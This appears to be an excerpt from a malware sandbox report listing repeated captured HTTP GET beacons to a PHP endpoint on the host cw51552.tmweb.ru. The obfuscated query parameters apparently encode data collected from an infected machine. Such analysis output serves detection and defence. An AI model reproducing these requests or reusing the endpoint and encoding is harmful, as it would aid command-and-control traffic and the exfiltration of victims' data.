Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
